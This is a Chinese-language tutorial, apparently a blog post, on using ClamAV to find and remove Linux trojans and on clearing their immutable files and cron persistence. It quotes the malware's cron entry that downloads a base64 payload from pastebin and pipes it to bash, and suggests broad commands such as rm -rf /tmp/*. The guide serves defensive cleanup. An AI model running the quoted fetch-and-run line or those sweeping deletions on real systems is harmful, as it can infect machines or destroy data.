1、ClamAV介绍

ClamAV是一个在命令行下查毒软件，因为它不将杀毒作为主要功能，默认只能查出您计算机内的病毒，但是无法清除，至多删除文件。ClamAV可以工作很多的平台上，但是有少数无法支持，这就要取决您所使用的平台的流行程度了。另外它主要是来防护一些WINDOWS病毒和木马程序。另外，这是一个面向服务端的软件。

ClamAV的官方下载地址为http://www.clamav.net/download.html 我直接使用wget下载源码安装文件。

相关使用参考http://wiki.ubuntu.org.cn/ClamAV

2、安装ClamAV

tar zxvf clamav-0.104.1.tar

cd clamav-0.104.1

./setup.sh

或者

sudo apt-get install clamav

3、升级病毒库:

sudo  freshclam

4、clamscan.扫描病毒

这里附带一些例子

扫描所有用户的主目录就使用 clamscan -r /home

扫描您计算机上的所有文件并且显示所有的文件的扫描结果，就使用 clamscan -r /

扫描您计算机上的所有文件并且显示有问题的文件的扫描结果， 就使用 clamscan -r --bell -i /

如果不知道木马可能的位置就全盘扫吧，时间较长，可以放在晚上扫

clamscan -r --bell -i /

/lib/libudev.so: Unix.Trojan.DDoS_XOR-1 FOUND

/lib/lib3.so.1: Linux.Trojan.Agent FOUND

/usr/bin/jjhltwoxvs: Unix.Trojan.DDoS_XOR-1 FOUND

----------- SCAN SUMMARY -----------

Known viruses: 4059163

Engine version: 0.98.7

Scanned directories: 1300819

Scanned files: 13315360

Infected files: 4

Total errors: 14433

Data scanned: 401706.34 MB

Data read: 788612.48 MB (ratio 0.51:1)

Time: 52742.298 sec (879 m 2 s)

以上标红的就是发现的病毒文件。

使用file /lib/libudev.so查看可以看到，都是可执行文件。

木马清理

rm -rf /lib/libudev.so  (删除木马程序）

rm -f /tmp/gates.lock 进程号

解决：可以删除后立马自己创建一个并设置不允许修改。

如：

rm /etc/cron.hourly/gcc.sh

touch /etc/cron.hourly/gcc.sh

chattr +i /etc/cron.hourly/gcc.sh

注：chattr +i :设定文件不能被删除、改名、设定链接关系，同时不能写入或新增内容

若以上也不行，那么就破坏掉木马文件，木马的监控进程发现文件存在应该不会重新创建，故可以破坏掉：

杀死可疑进程：

使用top查看到有可以进程

使用clamscn进行病毒扫描

kill -9 27232 杀掉进程

ps aux|grep kworker|grep -v grep|cut -c 9-15|xargs kill -9

几个命令：

"ps - ef"是linux 里查看所有进程的命令。这时检索出的进程将作为下一条命令"grep mcfcm_st"的输入。

"grep mcfcm_st"的输出结果是，所有含有关键字"mcfcm_st"的进程，这是Oracle数据库中远程连接进程的共同特点。

"grep -v grep"是在列出的进程中去除含有关键字"grep"的进程。

"cut -c 9-15"是截取输入行的第9个字符到第15个字符，而这正好是进程号PID。

"xargs kill -9"中的xargs命令是用来把前面命令的输出结果（PID）作为"kill -9"命令的参数，并执行该令。

然后用clamsan -r --beli -i /usr/bin/kworker --remove将病毒清理掉

如果tmp文件下文件没有用的话

rm -rf /tmp/*  删除掉所有文件

但是执行的过程中发现一些文件不能被删除，提示没有权限，什么？？？

仔细分析发先了问题之所在，原来文件自带i属性，难怪删不了。

用lsattr命令，问题就有了答案。

秘密终于暴露了，在lsattr命令下，t文件带有一个"i"的属性，所以才不可以删除，这个属性专门用来保护重要的文件不被删除，通常的情况下，懂得用这几个命令的

i ：这个i可就很厉害了。它可以让一个文件“不能被删除、改名，设置连接也无法写入或添加据。” 对于系统安全性有相当大的

帮助。只有root能设置此属性。

通常系统管理员有能力判断这个文件是否可以被删除。

详细参考：https://blog.csdn.net/JJuStudent/article/details/72805676

于是执行chattr -i thisxxs去掉i属性，之后就可完美删除掉。

清除定时任务

病毒进程会过一段时间重新启动，于是想到有定时任务，执行crontab -l发现果然有定时任务如下：
定时任务内容如下：

* /23 * * * *   (curl -fsSL https://pastebin.com/raw/Gw7mywhC || wget -q-O- https://pastebin.com/raw/Gw7mywhC)|base64 -d |/bin/bash

在执行crontab -r或者crontab -e删除和修改定时任务时，发现和上面一样，有i属性，不能操作。去掉i属性后即可删除掉定时任务。

定时任务被删除干净：